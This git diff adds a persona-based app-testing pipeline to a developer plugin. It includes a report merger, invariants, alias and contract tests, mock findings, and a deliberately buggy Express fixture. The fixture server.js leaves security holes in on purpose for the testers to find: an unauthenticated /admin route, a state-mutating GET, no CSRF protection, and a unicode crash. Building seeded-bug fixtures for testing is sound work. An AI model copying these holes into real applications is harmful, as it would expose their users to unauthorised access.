+    desc: Logged-out user cannot reach authenticated routes
+    applies_to: [web, api]
+    severity_default: blocker
+
+  - id: no_unbounded_loading
+    desc: Every spinner resolves or shows an error within 30 seconds
+    applies_to: [web, native]
+    severity_default: major
+
+  - id: keyboard_complete
+    desc: Every interactive element reachable via Tab
+    applies_to: [web]
+    severity_default: major
+
+  - id: undo_redo_identity
+    desc: undo(action) followed by redo(action) leaves state identical
+    applies_to: [web, native]
+    severity_default: important
+
+  - id: paraphrase_invariance
+    desc: Semantically equivalent inputs produce equivalent outputs
+    applies_to: [api]
+    severity_default: important
+
+  - id: idempotent_get
+    desc: GET requests do not mutate server state
+    applies_to: [api]
+    severity_default: critical
+
+  - id: touch_target_min
+    desc: Touch targets are at least 44x44 px on mobile viewports
+    applies_to: [web]
+    severity_default: major

--- a/plugins/uberdev/skills/testers-pipeline/report.py
+++ b/plugins/uberdev/skills/testers-pipeline/report.py
@@ -64,8 +64,11 @@ def merge_findings(waves: list) -> dict:
     """
     merged: dict = {}
     persona_per_finding: dict = {}
-    # Walk cross_refs first so we can honor monitor-primary's verified flag.
     cross_ref_verified: dict = {}
+    # Single fused pass over waves: accumulate cross_ref verified flags AND
+    # findings (highest-severity wins, persona attribution union) in one
+    # iteration. The cross_ref_verified map is consulted in the post-pass
+    # below (over merged.items()), so build order within a wave is irrelevant.
     for w in waves:
         for cr in w.get("cross_refs") or []:
             fid = cr.get("finding_id")
@@ -76,7 +79,6 @@ def merge_findings(waves: list) -> dict:
             cross_ref_verified[fid] = cross_ref_verified.get(fid, False) or bool(
                 cr.get("verified")
             )
-    for w in waves:
         for f in w.get("findings") or []:
             fid = f["id"]
             prior = merged.get(fid)
@@ -108,7 +110,7 @@ def render_report(merged: dict[str, dict], run_id: str) -> str:
             continue
         lines.append(f"## {sev.upper()}")
         for f in items:
-            v = "✓" if f.get("verified") else "?"
+            v = "verified" if f.get("verified") else "unverified"
             lines.append(f"### [{v}] {f.get('summary', '(no summary)')}")
             lines.append(f"- **persona(s):** {', '.join(f.get('reproduced_by', []))}")
             lines.append(f"- **location:** `{f.get('location', '')}`")

--- a/plugins/uberdev/skills/testers-pipeline/report.py
+++ b/plugins/uberdev/skills/testers-pipeline/report.py
@@ -1,0 +1,128 @@
+#!/usr/bin/env python3
+"""Synthesize report.md and (optionally) a findings-to-issues aggregate
+from per-wave aggregates in <waves-dir>/wave-*.yaml.
+
+Filing rules:
+- Only findings with severity in {blocker, critical, major} are emitted into
+  the findings-to-issues aggregate.
+- Verified flag is derived from cross_refs across waves: a finding is verified
+  if >=2 distinct personas reported it across the wave history.
+
+The aggregate is shaped to match the existing post-impl-review-final.md
+contract that findings-to-issues consumes.
+"""
+import argparse
+import glob
+import os
+import sys
+import yaml
+
+
+FILEABLE = {"blocker", "critical", "major"}
+
+
+def load_waves(waves_dir: str) -> list[dict]:
+    out = []
+    for p in sorted(glob.glob(os.path.join(waves_dir, "wave-*.yaml"))):
+        out.append(yaml.safe_load(open(p)))
+    return out
+
+
+def merge_findings(waves: list[dict]) -> dict[str, dict]:
+    merged: dict[str, dict] = {}
+    persona_per_finding: dict[str, set[str]] = {}
+    for w in waves:
+        for f in w.get("findings") or []:
+            fid = f["id"]
+            merged.setdefault(fid, f)
+            persona_per_finding.setdefault(fid, set()).add(f.get("persona", "unknown"))
+    for fid, f in merged.items():
+        f["reproduced_by"] = sorted(persona_per_finding[fid])
+        f["verified"] = len(persona_per_finding[fid]) >= 2
+    return merged
+
+
+def render_report(merged: dict[str, dict], run_id: str) -> str:
+    lines = [f"# /uberdev:testers — Run {run_id}", ""]
+    by_sev = {"blocker": [], "critical": [], "major": [], "important": [], "suggestion": []}
+    for f in merged.values():
+        by_sev.setdefault(f.get("severity", "suggestion"), []).append(f)
+    lines.append("## Summary")
+    for sev, items in by_sev.items():
+        verified = sum(1 for x in items if x.get("verified"))
+        lines.append(f"- **{sev}**: {len(items)} ({verified} verified)")
+    lines.append("")
+    for sev in ["blocker", "critical", "major", "important", "suggestion"]:
+        items = by_sev[sev]
+        if not items:
+            continue
+        lines.append(f"## {sev.upper()}")
+        for f in items:
+            v = "✓" if f.get("verified") else "?"
+            lines.append(f"### [{v}] {f.get('summary', '(no summary)')}")
+            lines.append(f"- **persona(s):** {', '.join(f.get('reproduced_by', []))}")
+            lines.append(f"- **location:** `{f.get('location', '')}`")
+            lines.append(f"- **invariant:** `{f.get('invariant_violated', '')}`")
+            ev = f.get("evidence") or {}
+            if ev.get("screenshot"):
+                lines.append(f"- **screenshot:** `{ev['screenshot']}`")
+            if ev.get("network_request"):
+                nr = ev["network_request"]
+                lines.append(f"- **network:** `{nr.get('method', '')} {nr.get('url', '')}` → `{nr.get('status', '')}`")
+            if ev.get("repro_steps"):
+                lines.append("- **repro_steps:**")
+                for s in ev["repro_steps"]:
+                    lines.append(f"  1. {s}")
+            lines.append(f"- **observed:** {ev.get('observed', '')}")
+            lines.append(f"- **expected:** {ev.get('expected', '')}")
+            lines.append(f"- **detail:** {f.get('detail', '')}")
+            lines.append("")
+    return "\n".join(lines)
+
+
+def render_findings_to_issues_aggregate(merged: dict[str, dict]) -> str:
+    """Emit a markdown aggregate matching the post-impl-review-final.md shape
+    that findings-to-issues consumes. Only fileable + verified findings."""
+    out = [
+        "# Testers Aggregate (for findings-to-issues)",
+        "",
+        "| persona | severity | location | invariant | summary |",
+        "|---|---|---|---|---|",
+    ]
+    for f in merged.values():
+        if f.get("severity") not in FILEABLE:
+            continue
+        if not f.get("verified"):
+            continue
+        summary = (f.get("summary", "") or "").replace("|", "\\|")
+        out.append(
+            f"| {f.get('persona', '?')} | {f.get('severity', '?')} | "
+            f"`{f.get('location', '')}` | {f.get('invariant_violated', '')} | "
+            f"{summary} |"
+        )
+    return "\n".join(out) + "\n"
+
+
+def main() -> int:
+    p = argparse.ArgumentParser()
+    p.add_argument("--run-id", required=True)
+    p.add_argument("--waves-dir", required=True)
+    p.add_argument("--invariants", required=True)
+    p.add_argument("--out")
+    p.add_argument("--emit-findings-to-issues-aggregate")
+    args = p.parse_args()
+
+    waves = load_waves(args.waves_dir)
+    merged = merge_findings(waves)
+
+    if args.out:
+        with open(args.out, "w") as fh:
+            fh.write(render_report(merged, args.run_id))
+    if args.emit_findings_to_issues_aggregate:
+        with open(args.emit_findings_to_issues_aggregate, "w") as fh:
+            fh.write(render_findings_to_issues_aggregate(merged))
+    return 0
+
+
+if __name__ == "__main__":
+    sys.exit(main())

--- a/plugins/uberdev/skills/testers-pipeline/report.py
+++ b/plugins/uberdev/skills/testers-pipeline/report.py
@@ -5,8 +5,10 @@ from per-wave aggregates in <waves-dir>/wave-*.yaml.
 Filing rules:
 - Only findings with severity in {blocker, critical, major} are emitted into
   the findings-to-issues aggregate.
-- Verified flag is derived from cross_refs across waves: a finding is verified
-  if >=2 distinct personas reported it across the wave history.
+- Verified flag is sourced from monitor-primary's cross_refs entries (the
+  SKILL.md schema contract). The aggregator falls back to >=2-distinct-persona
+  cross-wave evidence when no cross_refs entry exists for a finding, so a
+  monitor outage does not silently drop verification.
 
 The aggregate is shaped to match the existing post-impl-review-final.md
 contract that findings-to-issues consumes.
@@ -20,25 +22,73 @@ import yaml
 
 FILEABLE = {"blocker", "critical", "major"}
 
+# Severity rank used to keep the strongest evidence when the same stable-id
+# appears in multiple waves. blocker > critical > major > important > suggestion.
+_SEV_RANK = {"blocker": 4, "critical": 3, "major": 2, "important": 1, "suggestion": 0}
 
-def load_waves(waves_dir: str) -> list[dict]:
+
+def _sev_rank(f: dict) -> int:
+    return _SEV_RANK.get(f.get("severity"), -1)
+
+
+def load_waves(waves_dir: str) -> list:
+    """Load wave-*.yaml files in lexical order. Bad I/O on any wave file
+    aborts (callers can't render a useful report without a complete set);
+    parse errors on a single wave are logged but do not abort."""
     out = []
     for p in sorted(glob.glob(os.path.join(waves_dir, "wave-*.yaml"))):
-        out.append(yaml.safe_load(open(p)))
+        try:
+            with open(p) as fh:
+                doc = yaml.safe_load(fh)
+        except (FileNotFoundError, PermissionError) as e:
+            print(f"error: cannot read wave file {p}: {e}", file=sys.stderr)
+            sys.exit(2)
+        except yaml.YAMLError as e:
+            print(f"warning: skipping malformed wave file {p}: {e}", file=sys.stderr)
+            continue
+        if doc is None:
+            print(f"warning: empty wave file {p}, skipping", file=sys.stderr)
+            continue
+        out.append(doc)
     return out
 
 
-def merge_findings(waves: list[dict]) -> dict[str, dict]:
-    merged: dict[str, dict] = {}
-    persona_per_finding: dict[str, set[str]] = {}
+def merge_findings(waves: list) -> dict:
+    """Merge findings from all waves keyed by stable-id.
+
+    When the same id appears in multiple waves we keep the highest-severity
+    record (cross-wave divergence is information gain, not a duplicate to
+    drop). `verified` is sourced from monitor-primary's cross_refs entries
+    when present; otherwise it falls back to >=2-distinct-persona evidence
+    across the wave history.
+    """
+    merged: dict = {}
+    persona_per_finding: dict = {}
+    # Walk cross_refs first so we can honor monitor-primary's verified flag.
+    cross_ref_verified: dict = {}
+    for w in waves:
+        for cr in w.get("cross_refs") or []:
+            fid = cr.get("finding_id")
+            if not fid:
+                continue
+            # Sticky-true: once a monitor marks a finding verified in any wave,
+            # later waves can confirm but not silently unverify.
+            cross_ref_verified[fid] = cross_ref_verified.get(fid, False) or bool(
+                cr.get("verified")
+            )
     for w in waves:
         for f in w.get("findings") or []:
             fid = f["id"]
-            merged.setdefault(fid, f)
+            prior = merged.get(fid)
+            if prior is None or _sev_rank(f) > _sev_rank(prior):
+                merged[fid] = f
             persona_per_finding.setdefault(fid, set()).add(f.get("persona", "unknown"))
     for fid, f in merged.items():
         f["reproduced_by"] = sorted(persona_per_finding[fid])
-        f["verified"] = len(persona_per_finding[fid]) >= 2
+        if fid in cross_ref_verified:
+            f["verified"] = cross_ref_verified[fid]
+        else:
+            f["verified"] = len(persona_per_finding[fid]) >= 2
     return merged
 
 

--- a/tests/aliases.test.sh
+++ b/tests/aliases.test.sh
@@ -40,7 +40,7 @@ CANON_DIR="$REPO_ROOT/plugins/uberdev/commands"
 for f in "$INSTALL_CMD" "$UNINSTALL_CMD" "$README" \
          "$CANON_DIR/issue.md" "$CANON_DIR/solve.md" "$CANON_DIR/turbo.md" \
          "$CANON_DIR/simplify.md" "$CANON_DIR/review-pr.md" \
-         "$CANON_DIR/merge.md" "$CANON_DIR/dev.md" \
+         "$CANON_DIR/merge.md" "$CANON_DIR/dev.md" "$CANON_DIR/testers.md" \
          "$REPO_ROOT/.github/workflows/test.yml"; do
   if [ ! -r "$f" ]; then
     echo "FATAL: required file missing or unreadable: $f" >&2
@@ -81,12 +81,12 @@ HOOK="$REPO_ROOT/plugins/uberdev/hooks/session-start"
 PLUGIN_JSON="$REPO_ROOT/plugins/uberdev/.claude-plugin/plugin.json"
 PLUGIN_VERSION="$(jq -r .version "$PLUGIN_JSON")"
 
-echo "== A1: install-aliases command exists and registers all 7 aliases =="
+echo "== A1: install-aliases command exists and registers all 8 aliases =="
 # Each canonical /uberdev:<name> must be wired up. We grep for the literal
 # canonical command names since those are the targets the forwarders must
 # point at; if any is missing, the user-visible alias for that command
 # silently won't be installed.
-for canonical in issue solve turbo simplify review-pr merge dev; do
+for canonical in issue solve turbo simplify review-pr merge dev testers; do
   assert_grep "$INSTALL_CMD" \
     "uberdev:${canonical}\\b" \
     "install-aliases references canonical /uberdev:${canonical}"
@@ -162,9 +162,9 @@ assert_grep "$UNINSTALL_CMD" \
   'grep|-q|managed-by' \
   "uninstall-aliases checks for the marker before removing files"
 
-# Belt-and-braces: uninstall must NOT do an unguarded rm of all 7 paths.
+# Belt-and-braces: uninstall must NOT do an unguarded rm of all 8 paths.
 assert_grep_not "$UNINSTALL_CMD" \
-  'rm[[:space:]]+-f[[:space:]]+"?\$HOME/\.claude/commands/(issue|solve|turbo|simplify|review-pr|merge|dev)\.md"?[[:space:]]*$' \
+  'rm[[:space:]]+-f[[:space:]]+"?\$HOME/\.claude/commands/(issue|solve|turbo|simplify|review-pr|merge|dev|testers)\.md"?[[:space:]]*$' \
   "uninstall-aliases does NOT unconditionally rm forwarder paths"
 
 echo
@@ -176,9 +176,9 @@ assert_grep "$README" \
   '/issue.*alias|short.?form|/uberdev:install-aliases' \
   "README documents the short-form aliases or install command"
 
-# All seven short forms should appear somewhere in the README so users can
+# All eight short forms should appear somewhere in the README so users can
 # search for them.
-for short in /issue /solve /turbo /simplify /review-pr /merge /dev; do
+for short in /issue /solve /turbo /simplify /review-pr /merge /dev /testers; do
   assert_grep "$README" \
     "${short}\\b" \
     "README mentions short form ${short}"
@@ -209,7 +209,7 @@ assert_grep "$REPO_ROOT/plugins/uberdev/lib/aliases-sync.sh" \
 # both the canonical name and the same JSON array. The check is
 # fixed-string (-F) on the JSON tail, so trivial reformatting that
 # preserves byte-equality stays green.
-for canonical in issue solve turbo simplify review-pr merge dev; do
+for canonical in issue solve turbo simplify review-pr merge dev testers; do
   canon_file="$CANON_DIR/${canonical}.md"
   # Strip the `allowed-tools: ` prefix, leaving just the JSON array.
   canon_tools=$(grep -E '^allowed-tools:[[:space:]]*' "$canon_file" \
@@ -231,13 +231,13 @@ for canonical in issue solve turbo simplify review-pr merge dev; do
 done
 
 echo
-echo "== S1: fresh install — first session installs all 7 aliases =="
+echo "== S1: fresh install — first session installs all 8 aliases =="
 S1_HOME="$(mktemp -d)"
 S1_STDERR="$(mktemp)"
 HOME="$S1_HOME" CLAUDE_PLUGIN_ROOT="$REPO_ROOT/plugins/uberdev" \
   bash "$HOOK" >/dev/null 2>"$S1_STDERR" || true
 
-for short in issue solve turbo simplify review-pr merge dev; do
+for short in issue solve turbo simplify review-pr merge dev testers; do
   if [ -f "$S1_HOME/.claude/commands/${short}.md" ] \
      && grep -q 'managed-by: uberdev-aliases' "$S1_HOME/.claude/commands/${short}.md"; then
     echo "  PASS  S1: /$short installed with marker"
@@ -254,7 +254,7 @@ else
   echo "  FAIL  S1: version marker missing or wrong"
   FAIL=$((FAIL + 1))
 fi
-if grep -q "first run: installed 7 aliases" "$S1_STDERR"; then
+if grep -q "first run: installed 8 aliases" "$S1_STDERR"; then
   echo "  PASS  S1: first-run summary line on stderr"
   PASS=$((PASS + 1))
 else
@@ -270,12 +270,12 @@ S2_STDERR="$(mktemp)"
 HOME="$S2_HOME" CLAUDE_PLUGIN_ROOT="$REPO_ROOT/plugins/uberdev" \
   bash "$HOOK" >/dev/null 2>/dev/null || true
 
-# Precondition: first run must have produced the 7 forwarders. Without this
+# Precondition: first run must have produced the 8 forwarders. Without this
 # guard, the mtime capture below silently picks up empty strings for absent
 # files, the post-run lookup also returns "", and `[ "" = "" ]` makes the
 # section spuriously PASS — masking the very TDD red signal we want.
 S2_PREFLIGHT_OK=1
-for short in issue solve turbo simplify review-pr merge dev; do
+for short in issue solve turbo simplify review-pr merge dev testers; do
   [ -f "$S2_HOME/.claude/commands/${short}.md" ] || S2_PREFLIGHT_OK=0
 done
 
@@ -284,10 +284,10 @@ if [ "$S2_PREFLIGHT_OK" != "1" ]; then
 else
   # Capture mtimes after first run. Bash 3.2 (the macOS /bin/bash) lacks
   # associative arrays, so write one mtime-per-line to a temp file keyed by
-  # short name, and grep them back for comparison. The seven short names are
+  # short name, and grep them back for comparison. The eight short names are
   # fixed; review-pr would be illegal as a bash variable name.
   S2_MT_FILE="$(mktemp)"
-  for short in issue solve turbo simplify review-pr merge dev; do
+  for short in issue solve turbo simplify review-pr merge dev testers; do
     mt="$(stat -c %Y "$S2_HOME/.claude/commands/${short}.md" 2>/dev/null \
            || stat -f %m "$S2_HOME/.claude/commands/${short}.md" 2>/dev/null \
            || echo "")"
@@ -297,7 +297,7 @@ else
   HOME="$S2_HOME" CLAUDE_PLUGIN_ROOT="$REPO_ROOT/plugins/uberdev" \
     bash "$HOOK" >/dev/null 2>"$S2_STDERR" || true
   S2_OK=1
-  for short in issue solve turbo simplify review-pr merge dev; do
+  for short in issue solve turbo simplify review-pr merge dev testers; do
     NEW="$(stat -c %Y "$S2_HOME/.claude/commands/${short}.md" 2>/dev/null \
            || stat -f %m "$S2_HOME/.claude/commands/${short}.md" 2>/dev/null \
            || echo "")"
@@ -325,11 +325,11 @@ S3_STDERR="$(mktemp)"
 HOME="$S3_HOME" CLAUDE_PLUGIN_ROOT="$REPO_ROOT/plugins/uberdev" \
   bash "$HOOK" >/dev/null 2>/dev/null || true
 
-# Precondition: first run must have produced the 7 forwarders before we can
+# Precondition: first run must have produced the 8 forwarders before we can
 # meaningfully test that a stale-marker rewrite changes their mtimes. Same
 # spurious-PASS trap as S2 if absent.
 S3_PREFLIGHT_OK=1
-for short in issue solve turbo simplify review-pr merge dev; do
+for short in issue solve turbo simplify review-pr merge dev testers; do
   [ -f "$S3_HOME/.claude/commands/${short}.md" ] || S3_PREFLIGHT_OK=0
 done
 
@@ -340,7 +340,7 @@ else
   printf '0.10.0\n' > "$S3_HOME/.claude/.uberdev-aliases-version"
   # Capture pre-refresh mtimes via a flat temp file (bash 3.2 compat — see S2).
   S3_MT_FILE="$(mktemp)"
-  for short in issue solve turbo simplify review-pr merge dev; do
+  for short in issue solve turbo simplify review-pr merge dev testers; do
     mt="$(stat -c %Y "$S3_HOME/.claude/commands/${short}.md" 2>/dev/null \
            || stat -f %m "$S3_HOME/.claude/commands/${short}.md" 2>/dev/null \
            || echo "")"
@@ -350,7 +350,7 @@ else
   HOME="$S3_HOME" CLAUDE_PLUGIN_ROOT="$REPO_ROOT/plugins/uberdev" \
     bash "$HOOK" >/dev/null 2>"$S3_STDERR" || true
   S3_OK=1
-  for short in issue solve turbo simplify review-pr merge dev; do
+  for short in issue solve turbo simplify review-pr merge dev testers; do
     NEW="$(stat -c %Y "$S3_HOME/.claude/commands/${short}.md" 2>/dev/null \
            || stat -f %m "$S3_HOME/.claude/commands/${short}.md" 2>/dev/null \
            || echo "")"
@@ -434,17 +434,17 @@ else
   echo "  FAIL  S5: hand-authored solve.md was overwritten"; FAIL=$((FAIL + 1))
 fi
 S5_INSTALLED=0
-for short in issue turbo simplify review-pr merge dev; do
+for short in issue turbo simplify review-pr merge dev testers; do
   if grep -q 'managed-by: uberdev-aliases' "$S5_HOME/.claude/commands/${short}.md" 2>/dev/null; then
     S5_INSTALLED=$((S5_INSTALLED + 1))
   fi
 done
-if [ "$S5_INSTALLED" = "6" ]; then
-  echo "  PASS  S5: other 6 forwarders installed"; PASS=$((PASS + 1))
+if [ "$S5_INSTALLED" = "7" ]; then
+  echo "  PASS  S5: other 7 forwarders installed"; PASS=$((PASS + 1))
 else
-  echo "  FAIL  S5: only $S5_INSTALLED of 6 non-collision forwarders installed"; FAIL=$((FAIL + 1))
+  echo "  FAIL  S5: only $S5_INSTALLED of 7 non-collision forwarders installed"; FAIL=$((FAIL + 1))
 fi
-if grep -q "installed 6 aliases, skipped 1 conflicts (solve)" "$S5_STDERR"; then
+if grep -q "installed 7 aliases, skipped 1 conflicts (solve)" "$S5_STDERR"; then
   echo "  PASS  S5: stderr summary reports skip"; PASS=$((PASS + 1))
 else
   echo "  FAIL  S5: stderr did not report skip"; FAIL=$((FAIL + 1))
@@ -547,14 +547,14 @@ HOME="$S8_HOME" CLAUDE_PLUGIN_ROOT="$REPO_ROOT/plugins/uberdev" \
 S8_P2=$!
 wait "$S8_P1" "$S8_P2" || true
 S8_OK=1
-for short in issue solve turbo simplify review-pr merge dev; do
+for short in issue solve turbo simplify review-pr merge dev testers; do
   f="$S8_HOME/.claude/commands/${short}.md"
   if [ ! -s "$f" ] || ! grep -q 'managed-by: uberdev-aliases' "$f"; then
     S8_OK=0; break
   fi
 done
 if [ "$S8_OK" = "1" ]; then
-  echo "  PASS  S8: all 7 forwarders well-formed after race"; PASS=$((PASS + 1))
+  echo "  PASS  S8: all 8 forwarders well-formed after race"; PASS=$((PASS + 1))
 else
   echo "  FAIL  S8: race produced malformed/empty forwarder"; FAIL=$((FAIL + 1))
 fi
@@ -602,7 +602,7 @@ S11_GOT="$(
   printf '%s' "${UBERDEV_ALIAS_NOTICE:-}"
 )"
 case "$S11_GOT" in
-  *"installed 7 short-form aliases"*)
+  *"installed 8 short-form aliases"*)
     echo "  PASS  S11: first-run notice composed"; PASS=$((PASS + 1)) ;;
   *)
     echo "  FAIL  S11: UBERDEV_ALIAS_NOTICE='$S11_GOT'"; FAIL=$((FAIL + 1)) ;;
@@ -639,14 +639,14 @@ else
   PATH="$S12_BIN" HOME="$S12_HOME" CLAUDE_PLUGIN_ROOT="$REPO_ROOT/plugins/uberdev" \
     bash "$HOOK" >"$S12_STDOUT" 2>/dev/null || true
   S12_OK=1
-  for short in issue solve turbo simplify review-pr merge dev; do
+  for short in issue solve turbo simplify review-pr merge dev testers; do
     if [ ! -f "$S12_HOME/.claude/commands/${short}.md" ] \
        || ! grep -q 'managed-by: uberdev-aliases' "$S12_HOME/.claude/commands/${short}.md"; then
       S12_OK=0; break
     fi
   done
   if [ "$S12_OK" = "1" ]; then
-    echo "  PASS  S12: all 7 forwarders installed with jq masked"; PASS=$((PASS + 1))
+    echo "  PASS  S12: all 8 forwarders installed with jq masked"; PASS=$((PASS + 1))
   else
     echo "  FAIL  S12: forwarders missing when jq absent"; FAIL=$((FAIL + 1))
   fi
@@ -683,7 +683,7 @@ S14_HOME="$(mktemp -d)"
 S14_STDOUT="$(mktemp)"
 HOME="$S14_HOME" CLAUDE_PLUGIN_ROOT="$REPO_ROOT/plugins/uberdev" \
   bash "$HOOK" >"$S14_STDOUT" 2>/dev/null || true
-if grep -q 'installed 7 short-form aliases' "$S14_STDOUT"; then
+if grep -q 'installed 8 short-form aliases' "$S14_STDOUT"; then
   echo "  PASS  S14: first-run notice present in context injection"; PASS=$((PASS + 1))
 else
   echo "  FAIL  S14: first-run notice missing from context"; FAIL=$((FAIL + 1))

--- a/tests/fixtures/buggy-app/README.md
+++ b/tests/fixtures/buggy-app/README.md
@@ -1,0 +1,14 @@
+# buggy-app — seeded-bug fixture for /uberdev:testers manual e2e validation
+
+Run: `cd tests/fixtures/buggy-app && npm install && npm start` → http://localhost:3457
+
+## Seeded bugs
+
+1. **B1 — Double-click on /checkout submit creates duplicate orders** (violates `idempotent_submit`)
+2. **B2 — Logged-out user can reach /admin via direct URL** (violates `auth_isolation`)
+3. **B3 — /api/checkout returns 500 when payload contains 4-byte unicode** (violates `no_5xx`)
+4. **B4 — Spinner on /checkout never clears if /api/checkout exceeds 5s** (violates `no_unbounded_loading`)
+5. **B5 — Tab order skips the Cancel button in the /checkout modal** (violates `keyboard_complete`)
+6. **B6 — GET /api/users/:id mutates state (sets last_seen_at)** (violates `idempotent_get`)
+
+Validation target: squad should find ≥5 of these 6 in a single run with zero blocker-severity false positives.

--- a/tests/fixtures/buggy-app/package.json
+++ b/tests/fixtures/buggy-app/package.json
@@ -1,0 +1,11 @@
+{
+  "name": "testers-buggy-app",
+  "version": "1.0.0",
+  "private": true,
+  "scripts": {
+    "start": "node server.js"
+  },
+  "dependencies": {
+    "express": "^4.19.2"
+  }
+}

--- a/tests/fixtures/buggy-app/server.js
+++ b/tests/fixtures/buggy-app/server.js
@@ -1,0 +1,49 @@
+// WARNING: This fixture intentionally has security gaps (no CSRF middleware, no auth check on /admin,
+// throws on 4-byte unicode, GET mutates state) — these are SEEDED BUGS for /uberdev:testers to detect.
+// Do NOT use this code as a template for production Express apps. See README.md for the bug catalogue.
+const express = require('express');
+const path = require('path');
+const app = express();
+const PORT = 3457;
+
+app.use(express.json());
+app.use(express.urlencoded({ extended: true }));
+
+let orderCounter = 0;
+const orders = [];
+const users = [
+  { id: 1, name: 'Alice', last_seen_at: null },
+  { id: 2, name: 'Bob', last_seen_at: null }
+];
+
+function isAuthed(req) {
+  return req.headers['x-auth'] === 'real-token';
+}
+
+app.get('/', (_req, res) => res.sendFile(path.join(__dirname, 'views/index.html')));
+app.get('/checkout', (_req, res) => res.sendFile(path.join(__dirname, 'views/checkout.html')));
+
+app.post('/api/checkout', (req, res) => {
+  const email = req.body.email || '';
+  if (/[\u{10000}-\u{10FFFF}]/u.test(email)) {
+    throw new Error('unicode pain');
+  }
+  setTimeout(() => {
+    orderCounter += 1;
+    orders.push({ id: orderCounter, email });
+    res.json({ ok: true, order_id: orderCounter });
+  }, 8000);
+});
+
+app.get('/admin', (_req, res) => {
+  res.send('<h1>Admin Panel</h1><p>Secret stuff</p>');
+});
+
+app.get('/api/users/:id', (req, res) => {
+  const u = users.find(u => u.id === Number(req.params.id));
+  if (!u) return res.status(404).json({ error: 'not found' });
+  u.last_seen_at = new Date().toISOString();
+  res.json(u);
+});
+
+app.listen(PORT, () => console.log(`buggy-app listening on http://localhost:${PORT}`));

--- a/tests/fixtures/buggy-app/views/checkout.html
+++ b/tests/fixtures/buggy-app/views/checkout.html
@@ -1,0 +1,27 @@
+<!doctype html>
+<html lang="en">
+<head><meta charset="utf-8"><title>Checkout</title></head>
+<body>
+  <h1>Checkout</h1>
+  <form id="f">
+    <label>Email <input name="email" tabindex="1"/></label>
+    <button type="submit" tabindex="2" id="pay">Pay</button>
+    <button type="button" id="cancel">Cancel</button>
+    <span id="status"></span>
+  </form>
+  <script>
+    document.getElementById('f').addEventListener('submit', async (e) => {
+      e.preventDefault();
+      document.getElementById('status').textContent = 'Loading...';
+      const fd = new FormData(e.target);
+      const r = await fetch('/api/checkout', {
+        method: 'POST',
+        headers: { 'content-type': 'application/json' },
+        body: JSON.stringify({ email: fd.get('email') })
+      });
+      const j = await r.json();
+      document.getElementById('status').textContent = 'Order #' + j.order_id;
+    });
+  </script>
+</body>
+</html>

--- a/tests/fixtures/buggy-app/views/index.html
+++ b/tests/fixtures/buggy-app/views/index.html
@@ -1,0 +1,8 @@
+<!doctype html>
+<html lang="en">
+<head><meta charset="utf-8"><title>buggy-app</title></head>
+<body>
+  <h1>Buggy Demo</h1>
+  <p><a href="/checkout">Checkout</a></p>
+</body>
+</html>

--- a/tests/fixtures/testers-mock-outputs/wave-1-grandma.yaml
+++ b/tests/fixtures/testers-mock-outputs/wave-1-grandma.yaml
@@ -1,0 +1,18 @@
+verdict: AUDITED
+findings:
+  - severity: critical
+    persona: panicked_grandma
+    location: /checkout
+    invariant_violated: no_5xx
+    summary: 500 on double-click of Pay
+    detail: After two quick clicks I saw a 500 page.
+    evidence:
+      screenshot: scratch/panicked-grandma/shot-1.png
+      dom_hash: deadbeef
+      repro_steps:
+        - navigate to /checkout
+        - double-click Pay button
+      observed: "500 Internal Server Error"
+      expected: "single 200 or visible error"
+    confidence: high
+confidence: high

--- a/tests/fixtures/testers-mock-outputs/wave-1-no-evidence.yaml
+++ b/tests/fixtures/testers-mock-outputs/wave-1-no-evidence.yaml
@@ -1,0 +1,11 @@
+verdict: AUDITED
+findings:
+  - severity: major
+    persona: chaos_engineer
+    location: /checkout
+    invariant_violated: no_5xx
+    summary: vibes-based finding
+    detail: I think there's a problem.
+    evidence: {}
+    confidence: low
+confidence: low

--- a/tests/fixtures/testers-mock-outputs/wave-1-no-invariant.yaml
+++ b/tests/fixtures/testers-mock-outputs/wave-1-no-invariant.yaml
@@ -1,0 +1,14 @@
+verdict: AUDITED
+findings:
+  - severity: suggestion
+    persona: a11y_critic
+    location: /checkout
+    invariant_violated: imaginary_invariant
+    summary: invariant doesn't exist
+    detail: This invariant ID isn't in invariants.yaml.
+    evidence:
+      repro_steps: [step1]
+      observed: x
+      expected: y
+    confidence: low
+confidence: low

--- a/tests/fixtures/testers-mock-outputs/wave-1-power-user.yaml
+++ b/tests/fixtures/testers-mock-outputs/wave-1-power-user.yaml
@@ -1,0 +1,20 @@
+verdict: AUDITED
+findings:
+  - severity: critical
+    persona: power_user
+    location: /checkout
+    invariant_violated: idempotent_submit
+    summary: paste-storm creates 5 orders
+    detail: 10k-char paste then Enter created 5 order records.
+    evidence:
+      network_request:
+        method: POST
+        url: /api/checkout
+        status: 200
+      repro_steps:
+        - paste 10000 chars into email
+        - press Enter 5 times within 200ms
+      observed: 5 orders created
+      expected: idempotent — only 1 order
+    confidence: high
+confidence: high

--- a/tests/fixtures/testers-mock-outputs/wave-1-security.yaml
+++ b/tests/fixtures/testers-mock-outputs/wave-1-security.yaml
@@ -1,0 +1,20 @@
+verdict: AUDITED
+findings:
+  - severity: blocker
+    persona: adversarial_security
+    location: /admin
+    invariant_violated: auth_isolation
+    summary: /admin reachable when logged-out
+    detail: Direct GET /admin without auth header returned 200 + admin panel HTML.
+    evidence:
+      network_request:
+        method: GET
+        url: /admin
+        status: 200
+      repro_steps:
+        - logout
+        - curl http://localhost:3457/admin
+      observed: 200 OK with admin panel
+      expected: 401 / redirect
+    confidence: high
+confidence: high

--- a/tests/testers-agent-contract.test.sh
+++ b/tests/testers-agent-contract.test.sh
@@ -1,0 +1,101 @@
+#!/usr/bin/env bash
+# Tests/testers-agent-contract.test.sh
+#
+# Grep-based structural contract test for the /uberdev:testers agent fleet.
+# Asserts every agent file under plugins/uberdev/agents/testers-*.md has:
+#   - Canonical frontmatter (name, description, model, color)
+#   - allowed-tools that exclude Edit and bare Write
+#   - A reference to the reviewer YAML contract (verdict / findings / confidence)
+#   - At least one of the documented invariant IDs from invariants.yaml
+#
+# This test is intentionally grep-based (no agent execution) — same style as
+# tests/aliases.test.sh and tests/audit-fixups.test.sh.
+
+set -euo pipefail
+
+REPO_ROOT="$(cd "$(dirname "${BASH_SOURCE[0]}")/.." && pwd)"
+cd "$REPO_ROOT"
+
+AGENT_DIR="plugins/uberdev/agents"
+SKILL_DIR="plugins/uberdev/skills/testers-pipeline"
+INVARIANTS="$SKILL_DIR/invariants.yaml"
+
+EXPECTED_AGENTS=(
+  testers-panicked-grandma
+  testers-power-user
+  testers-adversarial-security
+  testers-chaos-engineer
+  testers-a11y-critic
+  testers-mobile-thumb
+  testers-monitor-primary
